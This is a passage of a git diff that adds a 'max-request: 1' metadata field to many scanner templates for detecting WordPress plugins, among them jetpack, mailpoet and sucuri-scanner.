a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml index e701e365ba..e4017b1a0a 100644 --- a/http/technologies/wordpress/plugins/jetpack.yaml +++ b/http/technologies/wordpress/plugins/jetpack.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/jetpack/ metadata: + max-request: 1 plugin_namespace: jetpack wpscan: https://wpscan.com/plugin/jetpack tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml index c0cc5400a8..53d6d393bd 100644 --- a/http/technologies/wordpress/plugins/kadence-blocks.yaml +++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/kadence-blocks/ metadata: + max-request: 1 plugin_namespace: kadence-blocks wpscan: https://wpscan.com/plugin/kadence-blocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml index 22687bcffe..c286e9a14f 100644 --- a/http/technologies/wordpress/plugins/kirki.yaml +++ b/http/technologies/wordpress/plugins/kirki.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/kirki/ metadata: + max-request: 1 plugin_namespace: kirki wpscan: https://wpscan.com/plugin/kirki tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml index b69d3d5bfe..364e3cd71e 100644 --- a/http/technologies/wordpress/plugins/leadin.yaml +++ b/http/technologies/wordpress/plugins/leadin.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/leadin/ metadata: + max-request: 1 plugin_namespace: leadin wpscan: https://wpscan.com/plugin/leadin tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index 7975a57702..4fcccbfc33 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/limit-login-attempts-reloaded/ metadata: + max-request: 1 plugin_namespace: limit-login-attempts-reloaded wpscan: https://wpscan.com/plugin/limit-login-attempts-reloaded tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml index ff4cef94d7..3fbc714d3b 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/limit-login-attempts/ metadata: + max-request: 1 plugin_namespace: limit-login-attempts wpscan: https://wpscan.com/plugin/limit-login-attempts tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml index a8903697b0..c49b506979 100644 --- a/http/technologies/wordpress/plugins/litespeed-cache.yaml +++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/litespeed-cache/ metadata: + max-request: 1 plugin_namespace: litespeed-cache wpscan: https://wpscan.com/plugin/litespeed-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml index 3f141c4476..dfcaf6f71b 100644 --- a/http/technologies/wordpress/plugins/loco-translate.yaml +++ b/http/technologies/wordpress/plugins/loco-translate.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/loco-translate/ metadata: + max-request: 1 plugin_namespace: loco-translate wpscan: https://wpscan.com/plugin/loco-translate tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml index 5355e988a2..61be246fee 100644 --- a/http/technologies/wordpress/plugins/loginizer.yaml +++ b/http/technologies/wordpress/plugins/loginizer.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/loginizer/ metadata: + max-request: 1 plugin_namespace: loginizer wpscan: https://wpscan.com/plugin/loginizer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loginpress.yaml b/http/technologies/wordpress/plugins/loginpress.yaml index 6f06b49011..1c16a72d76 100644 --- a/http/technologies/wordpress/plugins/loginpress.yaml +++ b/http/technologies/wordpress/plugins/loginpress.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/loginpress/ metadata: + max-request: 1 plugin_namespace: loginpress wpscan: https://wpscan.com/plugin/loginpress tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index 53d409fb68..50d2e6630b 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/mailchimp-for-woocommerce/ metadata: + max-request: 1 plugin_namespace: mailchimp-for-woocommerce wpscan: https://wpscan.com/plugin/mailchimp-for-woocommerce tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml index 0e908a9580..8d71f7bde9 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/mailchimp-for-wp/ metadata: + max-request: 1 plugin_namespace: mailchimp-for-wp wpscan: https://wpscan.com/plugin/mailchimp-for-wp tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml index aeb1875c57..5e1f97086e 100644 --- a/http/technologies/wordpress/plugins/mailpoet.yaml +++ b/http/technologies/wordpress/plugins/mailpoet.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/mailpoet/ metadata: + max-request: 1 plugin_namespace: mailpoet wpscan: https://wpscan.com/plugin/mailpoet tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml index 7c15702305..d87d456a8c 100644 --- a/http/technologies/wordpress/plugins/maintenance.yaml +++ b/http/technologies/wordpress/plugins/maintenance.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/maintenance/ metadata: + max-request: 1 plugin_namespace: maintenance wpscan: https://wpscan.com/plugin/maintenance tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml index 5ce87e6c71..aa9153241e 100644 --- a/http/technologies/wordpress/plugins/mainwp-child.yaml +++ b/http/technologies/wordpress/plugins/mainwp-child.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/mainwp-child/ metadata: + max-request: 1 plugin_namespace: mainwp-child wpscan: https://wpscan.com/plugin/mainwp-child tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml index c342e6b45a..09641796a3 100644 --- a/http/technologies/wordpress/plugins/malcare-security.yaml +++ b/http/technologies/wordpress/plugins/malcare-security.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/malcare-security/ metadata: + max-request: 1 plugin_namespace: malcare-security wpscan: https://wpscan.com/plugin/malcare-security tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml index e95041f555..28b70d09bf 100644 --- a/http/technologies/wordpress/plugins/megamenu.yaml +++ b/http/technologies/wordpress/plugins/megamenu.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/megamenu/ metadata: + max-request: 1 plugin_namespace: megamenu wpscan: https://wpscan.com/plugin/megamenu tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml index 879a0d1c12..b43c10ed7a 100644 --- a/http/technologies/wordpress/plugins/members.yaml +++ b/http/technologies/wordpress/plugins/members.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/members/ metadata: + max-request: 1 plugin_namespace: members wpscan: https://wpscan.com/plugin/members tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml index 985f5d373a..eb7e78bc7f 100644 --- a/http/technologies/wordpress/plugins/meta-box.yaml +++ b/http/technologies/wordpress/plugins/meta-box.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/meta-box/ metadata: + max-request: 1 plugin_namespace: meta-box wpscan: https://wpscan.com/plugin/meta-box tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml index 8e1cb46cf0..8881e23860 100644 --- a/http/technologies/wordpress/plugins/ml-slider.yaml +++ b/http/technologies/wordpress/plugins/ml-slider.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ml-slider/ metadata: + max-request: 1 plugin_namespace: ml-slider wpscan: https://wpscan.com/plugin/ml-slider tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml index 7e3e4e2d7e..7a58c58f63 100644 --- a/http/technologies/wordpress/plugins/newsletter.yaml +++ b/http/technologies/wordpress/plugins/newsletter.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/newsletter/ metadata: + max-request: 1 plugin_namespace: newsletter wpscan: https://wpscan.com/plugin/newsletter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml index 17ea142c46..5f99b8cac8 100644 --- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml +++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/nextend-facebook-connect/ metadata: + max-request: 1 plugin_namespace: nextend-facebook-connect wpscan: https://wpscan.com/plugin/nextend-facebook-connect tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml index 953e4ab3d8..b08876df04 100644 --- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml +++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/nextgen-gallery/ metadata: + max-request: 1 plugin_namespace: nextgen-gallery wpscan: https://wpscan.com/plugin/nextgen-gallery tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml index 92107fa69c..3f68dffe06 100644 --- a/http/technologies/wordpress/plugins/ninja-forms.yaml +++ b/http/technologies/wordpress/plugins/ninja-forms.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ninja-forms/ metadata: + max-request: 1 plugin_namespace: ninja-forms wpscan: https://wpscan.com/plugin/ninja-forms tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml index 5e1fe4ef5c..34f9bde1d6 100644 --- a/http/technologies/wordpress/plugins/ocean-extra.yaml +++ b/http/technologies/wordpress/plugins/ocean-extra.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ocean-extra/ metadata: + max-request: 1 plugin_namespace: ocean-extra wpscan: https://wpscan.com/plugin/ocean-extra tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml index 74fb3e6010..d9f645328f 100644 --- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml +++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/official-facebook-pixel/ metadata: + max-request: 1 plugin_namespace: official-facebook-pixel wpscan: https://wpscan.com/plugin/official-facebook-pixel tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml index b9f70ba555..8a1196fc9f 100644 --- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml +++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/one-click-demo-import/ metadata: + max-request: 1 plugin_namespace: one-click-demo-import wpscan: https://wpscan.com/plugin/one-click-demo-import tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml index 6486c02c9a..05025452b7 100644 --- a/http/technologies/wordpress/plugins/optinmonster.yaml +++ b/http/technologies/wordpress/plugins/optinmonster.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/optinmonster/ metadata: + max-request: 1 plugin_namespace: optinmonster wpscan: https://wpscan.com/plugin/optinmonster tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml index c45ef4bf89..0bc823830f 100644 --- a/http/technologies/wordpress/plugins/otter-blocks.yaml +++ b/http/technologies/wordpress/plugins/otter-blocks.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/otter-blocks/ metadata: + max-request: 1 plugin_namespace: otter-blocks wpscan: https://wpscan.com/plugin/otter-blocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml index 3743307dbc..dafe6974f6 100644 --- a/http/technologies/wordpress/plugins/password-protected.yaml +++ b/http/technologies/wordpress/plugins/password-protected.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/password-protected/ metadata: + max-request: 1 plugin_namespace: password-protected wpscan: https://wpscan.com/plugin/password-protected tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml index a4c6980041..ba05fb1e16 100644 --- a/http/technologies/wordpress/plugins/pdf-embedder.yaml +++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/pdf-embedder/ metadata: + max-request: 1 plugin_namespace: pdf-embedder wpscan: https://wpscan.com/plugin/pdf-embedder tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/photo-gallery.yaml b/http/technologies/wordpress/plugins/photo-gallery.yaml index a224d85727..7fbeea5917 100644 --- a/http/technologies/wordpress/plugins/photo-gallery.yaml +++ b/http/technologies/wordpress/plugins/photo-gallery.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/photo-gallery/ metadata: + max-request: 1 plugin_namespace: photo-gallery wpscan: https://wpscan.com/plugin/photo-gallery tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml index adf3387ddb..7f98d822a8 100644 --- a/http/technologies/wordpress/plugins/pixelyoursite.yaml +++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/pixelyoursite/ metadata: + max-request: 1 plugin_namespace: pixelyoursite wpscan: https://wpscan.com/plugin/pixelyoursite tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml index eb6e1aaa5d..89602f4264 100644 --- a/http/technologies/wordpress/plugins/polylang.yaml +++ b/http/technologies/wordpress/plugins/polylang.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/polylang/ metadata: + max-request: 1 plugin_namespace: polylang wpscan: https://wpscan.com/plugin/polylang tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/popup-builder.yaml b/http/technologies/wordpress/plugins/popup-builder.yaml index b3c83cd0bf..2f6513ca42 100644 --- a/http/technologies/wordpress/plugins/popup-builder.yaml +++ b/http/technologies/wordpress/plugins/popup-builder.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/popup-builder/ metadata: + max-request: 1 plugin_namespace: popup-builder wpscan: https://wpscan.com/plugin/popup-builder tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml index 96d8bd6aca..982306b13c 100644 --- a/http/technologies/wordpress/plugins/popup-maker.yaml +++ b/http/technologies/wordpress/plugins/popup-maker.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/popup-maker/ metadata: + max-request: 1 plugin_namespace: popup-maker wpscan: https://wpscan.com/plugin/popup-maker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml index 85955ac95e..fdcac13b56 100644 --- a/http/technologies/wordpress/plugins/post-smtp.yaml +++ b/http/technologies/wordpress/plugins/post-smtp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/post-smtp/ metadata: + max-request: 1 plugin_namespace: post-smtp wpscan: https://wpscan.com/plugin/post-smtp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml index a81fc892ca..fc316f9f7a 100644 --- a/http/technologies/wordpress/plugins/post-types-order.yaml +++ b/http/technologies/wordpress/plugins/post-types-order.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/post-types-order/ metadata: + max-request: 1 plugin_namespace: post-types-order wpscan: https://wpscan.com/plugin/post-types-order tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml index d9c6052cd7..975b63f5de 100644 --- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/premium-addons-for-elementor/ metadata: + max-request: 1 plugin_namespace: premium-addons-for-elementor wpscan: https://wpscan.com/plugin/premium-addons-for-elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml index afc1141e0c..5065659e82 100644 --- a/http/technologies/wordpress/plugins/pretty-link.yaml +++ b/http/technologies/wordpress/plugins/pretty-link.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/pretty-link/ metadata: + max-request: 1 plugin_namespace: pretty-link wpscan: https://wpscan.com/plugin/pretty-link tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml index d44add9ca6..732ffbc4eb 100644 --- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml +++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/really-simple-captcha/ metadata: + max-request: 1 plugin_namespace: really-simple-captcha wpscan: https://wpscan.com/plugin/really-simple-captcha tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml index 20ba5c2e16..12dffeb534 100644 --- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml +++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/really-simple-ssl/ metadata: + max-request: 1 plugin_namespace: really-simple-ssl wpscan: https://wpscan.com/plugin/really-simple-ssl tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml index cbcf3cf09d..ae0e76c4bb 100644 --- a/http/technologies/wordpress/plugins/redirection.yaml +++ b/http/technologies/wordpress/plugins/redirection.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/redirection/ metadata: + max-request: 1 plugin_namespace: redirection wpscan: https://wpscan.com/plugin/redirection tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml index 3311d42c94..b1718d1ccb 100644 --- a/http/technologies/wordpress/plugins/redux-framework.yaml +++ b/http/technologies/wordpress/plugins/redux-framework.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/redux-framework/ metadata: + max-request: 1 plugin_namespace: redux-framework wpscan: https://wpscan.com/plugin/redux-framework tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml index 46c1c22805..7543ac1d55 100644 --- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/regenerate-thumbnails/ metadata: + max-request: 1 plugin_namespace: regenerate-thumbnails wpscan: https://wpscan.com/plugin/regenerate-thumbnails tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml index 7c13b8d2a4..4a29cecdb0 100644 --- a/http/technologies/wordpress/plugins/safe-svg.yaml +++ b/http/technologies/wordpress/plugins/safe-svg.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/safe-svg/ metadata: + max-request: 1 plugin_namespace: safe-svg wpscan: https://wpscan.com/plugin/safe-svg tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml index 53b30ba721..be281d91e6 100644 --- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml +++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/seo-by-rank-math/ metadata: + max-request: 1 plugin_namespace: seo-by-rank-math wpscan: https://wpscan.com/plugin/seo-by-rank-math tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml index 9555d7aebd..6bd95ec077 100644 --- a/http/technologies/wordpress/plugins/sg-cachepress.yaml +++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/sg-cachepress/ metadata: + max-request: 1 plugin_namespace: sg-cachepress wpscan: https://wpscan.com/plugin/sg-cachepress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml index 180266f448..1fd64a5279 100644 --- a/http/technologies/wordpress/plugins/sg-security.yaml +++ b/http/technologies/wordpress/plugins/sg-security.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/sg-security/ metadata: + max-request: 1 plugin_namespace: sg-security wpscan: https://wpscan.com/plugin/sg-security tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml index 656ad7dfe5..648ee176ce 100644 --- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml +++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/shortcodes-ultimate/ metadata: + max-request: 1 plugin_namespace: shortcodes-ultimate wpscan: https://wpscan.com/plugin/shortcodes-ultimate tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index 015fb97043..7836d9554c 100644 --- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/shortpixel-image-optimiser/ metadata: + max-request: 1 plugin_namespace: shortpixel-image-optimiser wpscan: https://wpscan.com/plugin/shortpixel-image-optimiser tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml index 1d5224b457..ccd72e427a 100644 --- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/simple-custom-post-order/ metadata: + max-request: 1 plugin_namespace: simple-custom-post-order wpscan: https://wpscan.com/plugin/simple-custom-post-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml index aafd6c6a38..3622b2c6b3 100644 --- a/http/technologies/wordpress/plugins/siteguard.yaml +++ b/http/technologies/wordpress/plugins/siteguard.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/siteguard/ metadata: + max-request: 1 plugin_namespace: siteguard wpscan: https://wpscan.com/plugin/siteguard tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml index e10ab985da..9eff765d61 100644 --- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml +++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/siteorigin-panels/ metadata: + max-request: 1 plugin_namespace: siteorigin-panels wpscan: https://wpscan.com/plugin/siteorigin-panels tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml index 9881b591ae..c856e1fa9e 100644 --- a/http/technologies/wordpress/plugins/smart-slider-3.yaml +++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/smart-slider-3/ metadata: + max-request: 1 plugin_namespace: smart-slider-3 wpscan: https://wpscan.com/plugin/smart-slider-3 tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml index 0480b4b0e6..008440cc58 100644 --- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml +++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/so-widgets-bundle/ metadata: + max-request: 1 plugin_namespace: so-widgets-bundle wpscan: https://wpscan.com/plugin/so-widgets-bundle tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index 26d525386b..410776862f 100644 --- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/stops-core-theme-and-plugin-updates/ metadata: + max-request: 1 plugin_namespace: stops-core-theme-and-plugin-updates wpscan: https://wpscan.com/plugin/stops-core-theme-and-plugin-updates tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml index 3920c5cf56..f210a2a2f9 100644 --- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml +++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/sucuri-scanner/ metadata: + max-request: 1 plugin_namespace: sucuri-scanner wpscan: https://wpscan.com/plugin/sucuri-scanner tags: tech,wordpress,wp-plugin,top-100,top-200 diff 